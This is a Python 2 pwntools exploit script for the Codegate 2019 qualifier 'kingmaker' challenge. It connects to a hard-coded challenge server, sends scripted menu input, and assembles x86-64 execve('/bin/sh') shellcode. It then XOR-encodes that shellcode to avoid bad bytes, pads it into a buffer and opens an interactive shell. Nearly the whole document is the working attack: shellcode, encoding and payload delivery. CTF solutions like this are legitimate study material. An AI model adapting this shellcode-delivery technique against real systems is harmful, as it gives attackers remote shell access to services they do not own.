codegate 2019 qual: kingmaker execve
from pwn import *
HOST, PORT = "110.10.147.104", 13152
# HOST, PORT = "0.0.0.0", 31338  # alternative local target, kept from the original
r = remote(HOST, PORT)


def ii(x):
    """Send *x* to the remote as one line, coercing it to str first."""
    return r.sendline(str(x))


def go(x):
    """Call menu(), then send *x*; return whatever menu() returned.

    Nothing in this file defines menu(), and go() is never called, so this
    helper is dead code as written.
    """
    menu_result = menu()
    ii(x)
    return menu_result
# Scripted input for the challenge's menu-driven first stage, delivered as a
# single multi-line string so all lines go out in one sendline().  The tokens
# are presumably the moves/answers the service expects in order -- not
# derivable from this file -- so the literal is kept byte-for-byte.
ii("""1 lOv3 1 2
1
1 D0l1 1
1
2 1 HuNgRYT1m3
1
1 2
F0uRS3aS0n 1 1
""")
# Target architecture for pwntools' asm() call further down (x86-64).
context.arch='amd64'
# Assembly text handed to asm(code) below; by its own comments it is the
# pwntools execve("/bin///sh") stub.  Everything between the triple quotes,
# /* */ comments included, is runtime data fed to the assembler, so it is
# kept verbatim.  SYS_execve appears to be a symbolic constant that the
# pwntools assembler resolves for the configured arch -- confirm if porting.
code = """
/* execve(path='/bin///sh', argv=['sh'], envp=0) */
/* push '/bin///sh\x00' */
push 0x68
xor eax, eax
mov rax, 0x732f2f2f6e69622f
push rax
mov rdi, rsp
/* push argument array ['sh\x00'] */
/* push 'sh\x00' */
push 0x1010101 ^ 0x6873
xor dword ptr [rsp], 0x1010101
xor esi, esi /* 0 */
push rsi /* null terminate */
push 8
pop rsi
add rsi, rsp
push rsi /* 'sh\x00' */
mov rsi, rsp
xor edx, edx /* 0 */
/* call execve() */
push SYS_execve /* 0x3b */
pop rax
syscall
"""
# XOR the assembled stub against a fixed key blob, byte by byte.  zip() stops
# at the shorter operand, so if asm(code) were ever longer than the key blob
# the tail would be dropped silently -- nothing here compares the two lengths.
xorkey=[ord(x)^ord(y) for x, y in zip('\x13x\xfc\xb7\x1b\xb0\x8ds\xb9\x13\xba\xb9\x00\xaa\xdaf\x95\xda}\x9e\x02\xb90\xbe\xd8&\x1f\t\x10n\xcdu\x89S\x83\xbad jNF\xbb`#\t\x13a\xd8u\x96G\xe0\xfcW5iAS\xbb{"jUR\xd8v\x95R\xe0\xe7Ci/rS\xb8t\x04jNF\xbb0\xa2R\xe3\xe8V|4f0\xfeG\x19iAS\xbb+\xaa1\xa5\xdbV\x0c;s0\xd1\x86t5R\xbb\xc5\x92\xac\xcf\xd1\xa6t5R\xbb\xdf\x92\xac\xcf\xe5{\x15/rS\xb8THjNF\xbbxC\t\x13a\xd8%i\x1c\x10u\xd9V\xce8s0/\xcf\xc94\xdb\xa3\xba\xa7\xec T\x060\xcdRS3a\xbb\xda\x9e\xb9\xcf\xcdRS3a\xbbI\x90\xb9\xcf',asm(code))]
xorkey = bytearray(xorkey)
# Python 2 print statement: the whole script is Python 2 (str is bytes, which
# the str/bytearray concatenation below also relies on).
print hexdump(xorkey)
# The encoded bytes must contain no NUL or whitespace -- presumably because the
# service's input reader stops at those (not verifiable from this file).  Note
# that assert is stripped under python -O, so this guard can disappear.
assert all(x not in str(xorkey) for x in '\x00 \r\r\n\t')
# 32-byte prefix (5 filler bytes plus a fixed token, presumably checked by the
# service), NUL-padded to offset 0xc0, then the encoded bytes and a final NUL.
solution="A"*5+'AWTQJMJXTSPPZVCIDGQYRDINMCP'
solution=solution.ljust(0xc0,'\x00')+xorkey+'\x00'
# Deliver the buffer and hand the connection over to the user.
r.sendline(solution)
r.interactive()